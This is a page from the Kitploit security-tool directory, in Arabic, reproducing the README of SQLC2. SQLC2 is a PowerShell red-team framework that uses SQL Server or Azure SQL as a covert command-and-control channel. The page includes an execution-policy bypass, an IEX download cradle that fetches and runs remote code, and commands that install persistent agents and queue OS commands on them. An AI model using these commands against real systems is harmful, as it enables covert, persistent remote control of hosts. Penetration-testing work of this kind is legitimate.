Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SQLC2 — SQLC2 هو سكربت PowerShell لنشر وإدارة نظام قيادة وتحكم يستخدم SQL Server كخادم تحكم وكوكيل في آن واحد. | Kitploit
أدوات/GitHubGitHub/netspi/sqlc2
آليات الاستمراريةاختبار الاختراقأمن السحابةالقيادة والسيطرةالفريق الأحمرأمن قواعد البيانات
GitHubnetspi/sqlc2

SQLC2

SQLC2 هو سكربت PowerShell لنشر وإدارة نظام قيادة وتحكم يستخدم SQL Server كخادم تحكم وكوكيل في آن واحد.

عرض المستودع
7521منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SQLC2

SQLC2 هو سكربت PowerShell لنشر وإدارة نظام أوامر وتحكم يستخدم SQL Server كخادم تحكم وكوكيل في الوقت نفسه. في جوهره، SQLC2 هو مجرد سكربت PowerShell، وسكربت TSQL، وعدد قليل من الجداول في مثيل SQL Server يتتبع الوكلاء والأوامر والنتائج. ليس شيئًا معقدًا للغاية، لكنه قد يكون مفيدًا في بعض المهام.

للحصول على نظرة أكثر اكتمالًا حول SQLC2، راجع المدونة على https://blog.netspi.com/databases-and-clouds-sql-server-as-a-c2/.

المؤلف والترخيص

  • المؤلف: Scott Sutherland (@_nullbind)، NetSPI - 2018
  • الترخيص: BSD 3-Clause
  • التبعيات المطلوبة: لا شيء

لماذا نهتم بـ C2 قائم على SQL Server؟

المزيد من الشركات بدأت في استخدام قواعد بيانات Azure SQL Server. عندما يتم إنشاء مثيلات Azure SQL Server هذه، تصبح قابلة للوصول عبر نطاق فرعي من database.windows.net على المنفذ 1433. على سبيل المثال، يمكنني إنشاء مثيل SQL Server باسم "mysupersqlserver.database.windows.net". نتيجة لذلك، تسمح بعض إعدادات الشبكات المؤسسية بالوصول الصادر إلى أي نطاق فرعي من database.windows.net على المنفذ 1433.

الفكرة العامة هي أنه مع نمو اعتماد Azure SQL Server، ستكون هناك فرصة أكبر لاستخدام SQL Server كقناة تحكم تبدو إلى حد ما مثل حركة المرور العادية. SQLPS هو إثبات مفهوم أساسي إلى حد ما، لكنني أعتقد أنه عملي بما يكفي لتوضيح الفكرة. أعلم أن هناك عددًا لا بأس به من التحسينات التي يمكن إجراؤها، لكن إذا جربته، فسأحب أن أسمع ملاحظاتك.

ليس فقط لـ Azure

على الرغم من التركيز على استخدام SQLC2 مع مثيلات Azure SQL Server، يمكنك استضافة SQL Server الخاص بك في أي بيئة سحابية وجعله يستمع على المنفذ 443 مع تمكين SSL. وبالتالي، يمكن أن يوفر مرونة أكبر قليلاً اعتمادًا على مقدار الجهد الذي ترغب في بذله.

تحميل SQLC2

  • الخيار 1: قم بتنزيل السكربت واستيراده. لا يتطلب ذلك صلاحيات إدارية وسيتم استيراده فقط في الجلسة الحالية. ومع ذلك، قد يتم حظره بواسطة سياسات تنفيذ مقيدة، لذا قد ترغب في استخدام خيار التجاوز.

    Set-ExecutionPolicy Bypass -Scope Process

    Import-Module SQLC2.ps1

  • الخيار 2: قم بتحميله إلى جلسة عبر download cradle. لا يتطلب ذلك صلاحيات إدارية وسيتم استيراده فقط في الجلسة الحالية. لا ينبغي أن يتم حظره بواسطة سياسات التنفيذ.

    IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/SQLC2/master/SQLC2.ps1")

    ملاحظة: لتشغيله كمستخدم مجال بديل، استخدم أمر runas لتشغيل PowerShell أولاً.

    runas /noprofile /netonly /user:domain\user PowerShell.exe

مخطط بنية SQLC2 الأساسي

SQLC2Arch

وظائف المستخدم

فيما يلي قائمة بوظائف المستخدم التي تدعم سير العمل المقصود.

لقطات الشاشة

فيما يلي بعض النماذج من لقطات الشاشة.

تثبيت خادم SQLC2 (إنشاء الجداول):

Install-SQLC2Server -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Install C2

تثبيت وكيل SQLC2 (وظيفة وكيل SQL Server تستخدم ارتباط خادم):

Install-SQLC2AgentPs -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Install Agent

عرض وكلاء SQLC2:

Get-SQLC2Agent -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

SQLC2Arch

تعيين أمر لتنفيذه على الوكيل:

Set-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!' -Command "Whoami" -ServerName MSSQLSRV04

Set_Command

الحصول على نتائج الأوامر:

Get-SQLC2Result -Verbose -ServerName "MSSQLSRV04" -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Get Command Output

تنزيل الأداة
Function NameDescription
Install-SQLC2Serverتثبيت جداول SQLC2 على خادم SQL/قاعدة البيانات الهدف.
Install-SQLC2AgentPsتثبيت وكيل يستخدم وظيفة وكيل SQL Server وارتباط الخادم.
Install-SQLC2AgentLinkتثبيت وكيل يستخدم مهمة مجدولة أو مفتاح تسجيل لتنفيذ أوامر PowerShell.
Set-SQLC2Commandتعيين أوامر نظام التشغيل للوكلاء لتنفيذها.
Get-SQLC2Commandالحصول على قائمة بأوامر نظام التشغيل المعلقة من C2 للوكيل. يمكنه أيضًا تنفيذ الأمر المعلق باستخدام علامة -Execute.
Get-SQLC2Agentالحصول على قائمة بالوكلاء المسجلين على خادم SQLC2.
Get-SQLC2Resultالحصول على قائمة بالأوامر المعلقة والمكتملة. يدعم عوامل تصفية اسم الخادم والحالة وcid.
Remove-SQLC2Agentإزالة الوكلاء المسجلين على SQLC2. يكتفي بمسح السجل.
Remove-SQLC2Commandإزالة سجل الأوامر على خادم SQLC2.
Uninstall-SQLC2AgentLinkإلغاء تثبيت وكيل SQLC2 الذي يستخدم ارتباطات الخادم ووظيفة وكيل.
Uninstall-SQLC2AgentPsإلغاء تثبيت جميع طرق الثبات المستندة إلى نظام التشغيل.
Uninstall-SQLC2Serverإزالة جداول SQLC2 من قاعدة البيانات الهدف.